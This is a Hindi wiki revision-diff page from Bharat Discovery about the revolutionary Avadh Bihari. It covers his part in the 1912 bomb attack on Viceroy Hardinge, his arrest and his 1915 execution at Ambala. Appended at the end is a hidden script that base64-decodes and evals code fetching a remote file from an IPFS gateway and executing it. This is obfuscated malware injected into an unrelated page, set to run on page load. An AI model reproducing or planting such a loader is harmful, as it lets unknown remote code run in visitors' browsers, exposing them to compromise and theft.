अवध बिहारी: Difference between revisions

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
No edit summary
No edit summary
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{सूचना बक्सा राजनीतिज्ञ
{{सूचना बक्सा राजनीतिज्ञ
|चित्र=चित्र:Avadh-Behari1.jpg
|चित्र=Avadh-Behari1.jpg
|चित्र का नाम=
|चित्र का नाम=अवध बिहारी
|पूरा नाम=अवध बिहारी
|पूरा नाम=अवध बिहारी
|अन्य नाम=
|अन्य नाम=
|जन्म=[[1869]]
|जन्म=[[1869]]
|जन्म भूमि=
|जन्म भूमि=
|मृत्यु= [[11 मई]] [[1915]]
|मृत्यु= [[11 मई]], [[1915]]
|मृत्यु स्थान=
|मृत्यु स्थान=[[अम्बाला]]
|मृत्यु कारण=
|मृत्यु कारण=
|अभिभावक=
|अभिभावक=
Line 14: Line 14:
|स्मारक=  
|स्मारक=  
|क़ब्र=  
|क़ब्र=  
|नागरिकता=
|नागरिकता=भारतीय
|प्रसिद्धि=
|प्रसिद्धि=
|पार्टी=
|पार्टी=
Line 34: Line 34:
|अद्यतन={{अद्यतन|17:54, 14 मई 2017 (IST)}}
|अद्यतन={{अद्यतन|17:54, 14 मई 2017 (IST)}}
}}
}}
 
'''अवध बिहारी''' ([[अंग्रेज़ी]]: ''Avadh Bihari'', जन्म: [[1869]], मृत्यु:  [[11 मई]], [[1915]], [[अम्बाला]]) प्रसिद्ध क्रांतिकारी और [[रास बिहारी बोस]] के सहयोगी थे। इनका जन्म [[दिल्ली]] में हुआ था। बोस की क्रांतिकारी गतिविधियों के चलते अंग्रेजी शासकों की नींद हराम हो गई थी। उन्होंने वायसराय लॉर्ड हार्डिंग पर बम प्रहार किया तथा लारेंस गार्डस बम कांड में भी मुख्य भूमिका निभाई।  
'''अवध बिहारी''' ([[अंग्रेज़ी]]: ''Avadh Bihari'', जन्म: [[1869]], मृत्यु:  [[11 मई]] [[1915]]) एक प्रसिद्ध क्रांतिकारी [[रास बिहारी बोस]] के सहयोगी थे। इनका जन्म [[दिल्ली]] में हुआ था। बोस की क्रांतिकारी गतिविधियों के चलते अंग्रेजी शासकों की नींद हराम हो गई थी। उन्होंने वायसराय लार्ड हार्डिंग्ज पर बम प्रहार किया तथा लारेंस गार्डस बम कांड में भी मुख्य भूमिका निभाई।  
==संक्षिप्त  परिचय==
====संक्षिप्त  परिचय====
*अवध बिहारी ने आजीविका के लिए अध्यापन कार्य करते हुए [[पंजाब]] और [[उत्तर प्रदेश]] में क्रान्तिकारी गतिविधियों को आगे बढ़ाने में महत्त्वपूर्ण योगदान दिया।
*इन्होंने आजीविका के लिए अध्यापन कार्य करते हुए [[पंजाब]] और [[उत्तर प्रदेश]] में क्रान्तिकारी गतिविधियों को आगे बढ़ाने में मह्त्त्वपूर्ण योगदान दिया।
*[[दिल्ली]] में सन [[1912]] में वायसराय के जुलूस पर बम फेंकने की योजना बनाने में भी अवध बिहारी सम्मिलित थे। रास बिहारी बोस इस घटना के बाद पहले [[देहरादून]] और उसके बाद [[जापान]] चले गए थे।
*अवध बिहारी [[दिल्ली]] में वायसराय के जुलूस पर बम फेंकने की योजना बनाने में भी सम्मिलित थे।
*फ़रवरी, 1914 में अवध बिहारी को गिरफ़्तार कर लिया गया और दिल्ली षड़यंत्र केस के अंतर्गत अभियोग चलाया गया।
*रास बिहारी बोस इस घटना के बाद पहले [[देहरादून]] और उसके बाद [[जापान]] चले गए थे।
*वायसराय की हत्या की कोशिश का अभियोग लगाकर [[मास्टर अमीरचंद]], [[बालमुकुंद]] और बंसत कुमार विश्वास के साथ अवध बिहारी को भी मौत की सजा दी गई और [[11 मई]], 1915 को अंबाला जेल में उन्हें फाँसी पर लटका दिया गया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=57|url=}}</ref>
*परंतु वायसराय की हत्या की कोशिश का अभियोग लगाकर मास्टर अभियचंद और बंसत कुमार विश्वास के साथ बिहारी को भी मौत की सजा दी गई और [[11 मई]] 1915 को अंबाला जेल फांसी पर लटका दिया गया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=57|url=}}</ref>




{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
==टीका टिप्पणी और संदर्भ==
==टीका टिप्पणी और संदर्भ==
<references/>
<references/>
==बाहरी कड़ियाँ==
==संबंधित लेख==
==संबंधित लेख==
{{स्वतन्त्रता सेनानी}}
{{स्वतन्त्रता सेनानी}}
[[Category:स्वतन्त्रता_सेनानी]]
[[Category:स्वतन्त्रता_सेनानी]][[Category:जीवनी साहित्य]][[Category:औपनिवेशिक काल]][[Category:अंग्रेज़ी शासन]][[Category:चरित कोश]][[Category:इतिहास कोश]]
[[Category:चरित कोश]]
__INDEX__
__INDEX__

Latest revision as of 15:08, 29 April 2019

अवध बिहारी
पूरा नाम अवध बिहारी
जन्म 1869
मृत्यु 11 मई, 1915
मृत्यु स्थान अम्बाला
नागरिकता भारतीय
विशेष योगदान अवध बिहारी ने वायसराय लार्ड हार्डिंग्ज पर बम प्रहार किया तथा लारेंस गार्डस बम कांड में भी मुख्य भूमिका निभाई।
अद्यतन‎

अवध बिहारी (अंग्रेज़ी: Avadh Bihari, जन्म: 1869, मृत्यु: 11 मई, 1915, अम्बाला) प्रसिद्ध क्रांतिकारी और रास बिहारी बोस के सहयोगी थे। इनका जन्म दिल्ली में हुआ था। बोस की क्रांतिकारी गतिविधियों के चलते अंग्रेजी शासकों की नींद हराम हो गई थी। उन्होंने वायसराय लॉर्ड हार्डिंग पर बम प्रहार किया तथा लारेंस गार्डस बम कांड में भी मुख्य भूमिका निभाई।

संक्षिप्त परिचय

  • अवध बिहारी ने आजीविका के लिए अध्यापन कार्य करते हुए पंजाब और उत्तर प्रदेश में क्रान्तिकारी गतिविधियों को आगे बढ़ाने में महत्त्वपूर्ण योगदान दिया।
  • दिल्ली में सन 1912 में वायसराय के जुलूस पर बम फेंकने की योजना बनाने में भी अवध बिहारी सम्मिलित थे। रास बिहारी बोस इस घटना के बाद पहले देहरादून और उसके बाद जापान चले गए थे।
  • फ़रवरी, 1914 में अवध बिहारी को गिरफ़्तार कर लिया गया और दिल्ली षड़यंत्र केस के अंतर्गत अभियोग चलाया गया।
  • वायसराय की हत्या की कोशिश का अभियोग लगाकर मास्टर अमीरचंद, बालमुकुंद और बंसत कुमार विश्वास के साथ अवध बिहारी को भी मौत की सजा दी गई और 11 मई, 1915 को अंबाला जेल में उन्हें फाँसी पर लटका दिया गया।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. भारतीय चरित कोश |लेखक: लीलाधर शर्मा 'पर्वतीय' |प्रकाशक: शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली |पृष्ठ संख्या: 57 |

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>